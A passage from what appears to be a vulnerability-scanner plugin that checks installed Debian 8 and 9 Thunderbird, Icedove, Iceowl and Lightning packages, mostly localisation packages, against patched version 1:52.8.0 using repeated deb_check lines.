prefix:\"thunderbird-l10n-gl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-he\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-hr\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-hsb\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-hu\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-hy-am\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-id\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-is\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-it\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-ja\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-kab\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-ko\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-lt\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-nb-no\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-nl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-nn-no\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-pa-in\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-pl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-pt-br\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-pt-pt\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-rm\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-ro\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-ru\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-si\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-sk\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-sl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-sq\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-sr\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-sv-se\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-ta-lk\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-tr\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-uk\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-vi\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-zh-cn\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-zh-tw\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"calendar-google-provider\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-dbg\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-dev\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-all\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-ar\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-ast\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-be\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-bg\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-bn-bd\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-br\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-ca\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-cs\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-da\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-de\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-dsb\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-el\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-en-gb\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-es-ar\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-es-es\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-et\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-eu\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-fi\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-fr\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-fy-nl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-ga-ie\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-gd\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-gl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-he\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-hr\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-hsb\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-hu\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-hy-am\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-id\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-is\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-it\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-ja\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-kab\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-ko\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-lt\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-nb-no\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-nl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-nn-no\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-pa-in\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-pl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-pt-br\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-pt-pt\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-rm\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-ro\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-ru\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-si\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-sk\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-sl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-sq\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-sr\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-sv-se\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-ta-lk\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-tr\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-uk\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-vi\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-zh-cn\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icedove-l10n-zh-tw\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-extension\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-ar\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-ast\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-be\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-bg\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-bn-bd\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-br\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-ca\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-cs\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-cy\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-da\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-de\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-dsb\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-el\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-en-gb\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-es-ar\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-es-es\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-et\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-eu\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-fi\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-fr\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-fy-nl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-ga-ie\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-gd\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-gl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-he\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-hr\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-hsb\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-hu\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-hy-am\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-id\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-is\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-it\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-ja\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-kab\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-ko\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-lt\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-nb-no\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-nl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-nn-no\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-pa-in\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-pl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-pt-br\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-pt-pt\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-rm\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-ro\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-ru\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-si\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-sk\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-sl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-sq\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-sr\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-sv-se\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-ta-lk\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-tr\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-uk\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-vi\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-zh-cn\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"iceowl-l10n-zh-tw\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-ar\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-ast\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-be\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-bg\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-bn-bd\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-br\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-ca\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-cs\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-cy\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-da\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-de\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-dsb\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-el\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-en-gb\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-es-ar\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-es-es\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-et\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-eu\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-fi\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-fr\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-fy-nl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-ga-ie\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-gd\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-gl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-he\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-hr\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-hsb\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-hu\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-hy-am\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-id\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-is\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-it\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-ja\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-kab\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-ko\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-lt\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-nb-no\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-nl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-nn-no\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-pa-in\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-pl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-pt-br\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-pt-pt\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-rm\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-ro\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-ru\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-si\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-sk\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-sl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-sq\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-sr\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-sv-se\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-ta-lk\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-tr\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-uk\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-vi\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-zh-cn\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"lightning-l10n-zh-tw\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-dbg\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-dev\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-all\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-ar\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-ast\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-be\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-bg\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-bn-bd\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-br\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-ca\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-cs\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-da\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-de\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-dsb\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-el\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-en-gb\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-es-ar\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-es-es\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-et\", 